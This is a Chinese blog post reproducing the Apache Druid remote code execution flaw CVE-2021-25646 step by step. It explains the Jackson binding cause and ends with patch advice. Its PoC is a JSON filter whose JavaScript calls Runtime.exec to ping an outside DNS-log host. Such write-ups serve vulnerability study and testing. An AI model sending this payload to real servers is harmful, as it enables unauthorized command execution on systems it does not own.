druid 远程命令执行 (CVE-2021-25646)

最新推荐文章于 2024-03-08 10:47:35 发布
最新推荐文章于 2024-03-08 10:47:35 发布
阅读量824 收藏
点赞数
分类专栏: 漏洞复现 文章标签: Druid0.20 RCE CVE-2021-25646 jackson
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40646572/article/details/130644901
版权

漏洞原理

该漏洞主要就是根据Jackson解析特性(解析name为""时)会将value值绑定到对象(JavaScriptDimFilter,type为javascript时指定的)的对应参数(config)上,造成JavaScriptDimFilter中function属性中的javascript代码被执行。攻击者可以构造传入的json串来控制一些敏感的参数,其中参数function会被javascript rhino引擎执行,其中的js代码是支持调用java函数的,所以可以调用系统命令。

漏洞范围

Apache Druid < 0.20.1

漏洞复现过程

在这里插入图片描述
启动服务,输入对应的8888对应的端口。druid服务控制端一般是绑定在8888端口。
在这里插入图片描述
打开 Load Data 功能。
在这里插入图片描述

在LoadData 功能页面中存在Local disk功能,将其打开。

在这里插入图片描述

填写对应的值,其中的值是一一对应的。

Base directory: quickstart/tutorial/
File filter: wikiticker-2015-09-12-sampled.json.gz

填完就一直下一步。
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

Dimension:aaa
Value:bbb

直到出现填写optional filter。填完后,点击Add功能时,将包拦截。
在这里插入图片描述
将filter中的内容进行替换,修改为我们的poc。
在这里插入图片描述
在这里插入图片描述

filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('ping ikczyv.dnslog.cn')}",
"dimension":"added",
"":{
"enabled":"true"
}
}

在这里插入图片描述
发送包后,在dnslog平台可以获取到dns解析记录。
在这里插入图片描述

修复建议

1、及时更新新的版本。
2、限制非信任的设备对服务的访问

参考链接

【CVE-2021-25646 | 附PoC】Apache Druid 远程代码执行漏洞:https://cloud.tencent.com/developer/article/1799712
CVE-2021-25646:Apache Druid RCE远程代码执行复现:https://blog.csdn.net/m0_58596609/article/details/122217842
Apache Druid 代码执行(CVE-2021-25646)漏洞复现:https://edu.yijinglab.com/post/199

bigdogeggs
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
CVE-2021-25646Apache Druid远程代码执行漏洞
就是法老
08-24 1979
一:漏洞描述 阿里云安全向Apache官方报告了Apache Druid远程代码执行漏洞,分配CVE编号为CVE-2021-25646 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用 Apache Druid 漏洞可以执行任意代码。 影响范围:Apache Druid &l
Apache Druid 代码执行漏洞(CVE-2021-25646
最新发布
qq_69775412的博客
03-08 695
Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用,并且默认是禁用的。然而,在Druid 0.20.0及以前的版本中,攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码,而不管服务器配置如何,这将导致代码和命令执行漏洞。
【漏洞复现】Apache Druid 远程代码执行 CVE-2021-25646
Adminxe的博客
02-03 421
0x00 前言 这个漏洞的根本问题是一个druid中全局性的问题,开发者在使用Jackson相关的标签时,出现疏漏,使得攻击者可以构造传入的json串来控制一些敏感的参数。 阿里云安全@Litch1向Apache官方报告了Apache Druid远程代码执行漏洞 当时 漏洞 已知,处于某些原因,提取的poc也没进行公布,今天醒来,看到很多公众号发 ,也就总结一下,集各家所长,写一个复现的文章。 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据...
Apache Druid远程代码执行漏洞(CVE-2021-25646)
weixin_44047654的博客
12-05 1618
Apache Druid远程代码执行漏洞(CVE-2021-25646)
CVE-2021-25646Apache Druid RCE远程代码执行复现
m0_58596609的博客
12-29 1475
CVE-2021-25646Apache Druid RCE远程代码执行复现
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
CVE-2012-0158的POC
04-18
这是office安全漏洞的一个POC,用来帮助分析理解漏洞原理。
CVE-2021-21315-PoC:CVE 2021-21315 PoC
03-03
CVE-2021-21315系统信息 这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()的服务参数...仅允许使用字符串,拒绝任何数组。字符串清理如预期般运作。” 因为没有很好地解释漏洞(我认为),所以我决定根据系统信息的漏洞版本编写小型应用程序。 PoC包含: 使用明确的易受攻击的系统信息测试Node.js中制作的应用 简单测试有效负载即可在受影响的计算机上创建.txt文件 重现步骤: 在Linux服务器环境上运行应用程序 向site.com/api/getServices?name=nginx发出GET请求(nginx只是示例) 现在尝试发送这样的请求:yoursite.co
【技术分享】CVE-2021-25646 Apache Druid 远程代码执行漏洞分析 .pdf
09-05
【技术分享】CVE-2021-25646 Apache Druid 远程代码执行漏洞分析 数据安全 web安全 威胁情报 安全防护 安全测试
Silentsoul04#vulnerability-paper-1#CVE-2021-25646Apache Druid R
07-25
声明:请勿用作违法用途,否则后果自负0x01 简介Druid 不仅是一个数据库连接池,还包含一个 ProxyDriver、一系列内置的 JDBC 组件库、一个
漏洞复现 || Apache Druid代码执行
失心少年
07-10 340
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!在Apache Druid使用Apache Kafka加载数据的场景下,未经身份认证的远程攻击者可配置Kafka连接属性,从而利用CVE-2023-25194漏洞触发JNDI注入,最终执行任意代码。
Apache Druid RCE(CVE-2021-25646)复现附漏洞检测POC
yy
02-26 6433
目录 漏洞简介 影响版本 docker-compose一键搭建漏洞环境 漏洞复现 1. 用DNSlog探测远程命令执行 2. 反弹shell 漏洞检测POC 漏洞简介 Apache DruidApache Druid是一个专为大数据集的快速切片分析(OLAP查询)而设计的实时分析数据库。Druid作为数据库,最常用于支持以下用例:实时摄取、快速查询和高运行时长。例如,Druid一般用于支持分析型应用程序的GUI,或是需要快速聚合的高并发API后台。Druid最适合用于面向事件的数据。
Apache Druid远程代码执行漏洞(CVE-2021-25646
chaojixiaojingang
03-15 9523
1.漏洞描述 Apache Druid 是一个集时间序列数据库、数据仓库和全文检索系统特点于一体的分析性数据平台。Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用Apache Druid漏洞可以执行任意代码。 2.影响版本 Apache Druid < 0.20...
Apache Druid 远程命令执行
m0_46689007的博客
11-29 383
Apache Druid 远程命令执行(附流量分析)
springboot druid-spring-boot-starter
12-02
`druid-spring-boot-starter`是一个用于在Spring Boot应用程序中集成Druid连接池的Starter。Druid是一个高性能的JDBC连接池,具有监控和扩展功能。使用`druid-spring-boot-starter`可以轻松地将Druid连接池集成到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值